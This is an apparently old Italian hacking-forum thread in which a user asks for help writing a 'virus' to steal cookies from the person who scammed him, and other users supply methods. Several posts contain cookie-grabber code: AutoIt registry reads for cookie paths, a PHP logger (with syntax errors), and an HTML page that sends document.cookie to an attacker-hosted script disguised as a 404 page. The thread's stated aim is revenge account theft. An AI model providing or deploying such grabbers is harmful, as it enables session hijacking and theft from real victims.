• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Richiesta Virus

Live

Utente Attivo
Autore del topic
14 Aprile 2008
448
56
Miglior risposta
0
Raga Come Pochi DI Voi Sanno Mi Anno Scammato Tutto.. Non Dico Il Nome Pke Lui Lo Sa e Leggerà Anche Questa Conversazione..

In Pratica Voglio Sapere Cone Creare Un (virus) Con Autoit Che memorizza i Cookies Della Vittima e Li Invii Da A Me...Io Sto Provando Ma Non Riesco Vi Prego Aiutatemi..

non conosco l'autoit... Credo che in bat riusciresti però la vittima deve essere n00b ti deve dire dove sono i cookie!

Per salvare i cookie della vittima più che costruire un programma secondo me è più efficace creare una pagina web in php con un XSS :emoji_relieved:

Ti dò solo questo spunto e anche se saprei costruirlo non lo posto perchè sono appena stato scammato con questo metodo ^^

O trovato le destinazioni Dei Cookies Pero Ora Non So Come Fare Tutto In Automatico!
$sCookiePath=RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders","Cookie")
$sHistoryPath=RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders","History")

Prese Da Qui:
Perfavore, Entra oppure Registrati per vedere i Link!
Ditemi Se Capite Qualcosa..

io quoto con pazienza, è meglio fare una pagina web.
nessuno si fida più degli eseguibili.

Se proprio ti vuoi vendicare googla un po' :emoji_relieved:

[google]Cookie Grabber[/google]

Mi sà che sto dicendo troppe cose *-*
E non fare troppe lamerate (pensa a come ti sei sentito tu quando ti hanno scammato ^^)

Reversa un po'

se sai l'autoit prendi un programma che ha queste funzioni ( ce ne sono in giro ) e lo usi per i tuoi scopi sostituendo quello che ti serve

è il metodo più facile che c'è, così mpari anche com'è fatto il programma magari un giorno vorresti crearlo da zero

Raga Mi Potete Postare Un Cookie Grabber Ke Funziona In Php Pero dovete Spiegarmi Un Po COme FUnziona Pke Sn Un Po Inesperto In Questo Campo..Grazie

Magari Claudio Me LO Posti xD O Trovato Qualcosa Ma Dubiro Ke Funzioni..

<?php
$cookie = $_GET['c'];
$ip = getenv (’REMOTE_ADDR’);
$date=date(”j F, Y, g:i a”);
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’file.txt’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
?>

il link dove indirizzare la vittima dovrà essere:

salva il testo in rosso in estensione .php poi hostalo sul tuo sito assieme ad un altro file di nome "file.txt"
nel link la parte dove c'è scritto grabber.php la dovrai rinominare con il nome che hai dato al php.
^^

Ultima modifica:
Smeraldo Googla un po'... ne ho appena provato uno tra i primi che escono su google e funziona :-)

Comunque quoto Abe..
Se vorresti andare avanti in questo campo ti conviene cercare di farlo in autoit per acquisire esperienza ;)

<?php
$cookie = $_GET['c'];
$ip = getenv (’REMOTE_ADDR’);
$date=date(”j F, Y, g:i a”);
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’file.txt’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
?>

il link dove indirizzare la vittima dovrà essere:

salva il testo in rosso in estensione .php poi hostalo sul tuo sito assieme ad un altro file di nome "file.txt"
nel link la parte dove c'è scritto grabber.php la dovrai rinominare con il nome che hai dato al php.
^^

Sei davvero sicuro che quel codice che hai postato funziona per fregare i cookie alla vittima? Secondo me funge soltanto per mezzo di un'xss, perchè da quello che so il bug che usava è stato fixato

Parse error: syntax error, unexpected T_STRING in /membri/******/grabber.php on line 4

:lol: come non detto, non funziona, ne cerco uno più recente.

Abe tu ne conosci qualcuno?

Abe Mi Da Questo Errore

Parse error: syntax error, unexpected T_STRING in /membri/musicnew/grabber.php on line 5

Lo o Hostato Su Altervista

questo l'ho testato, ma grabba solo delle cazz*** look:

destinazione dei coockie salva come : cookies.html

<html>
<head>
<title>Titolo!</title>
</head>
<body>
<script>window.location="http://www.nostrosito.altervista.org/cookie.php?data=" + document.cookie</script>
</body>
</html>

Quest altro è da salvare come cookie.php

<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<?php
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
<p>The requested URL was not found on this server.</p>
</body>
</html>

lo provato nn funziona xD me li so provatti tutti quelli sul web

guarda che x guardare i coockie devi andare su cookies.html dentro l'ftp non dall'esterno, comunque non servono a un bel niente, non grabbano più le pass.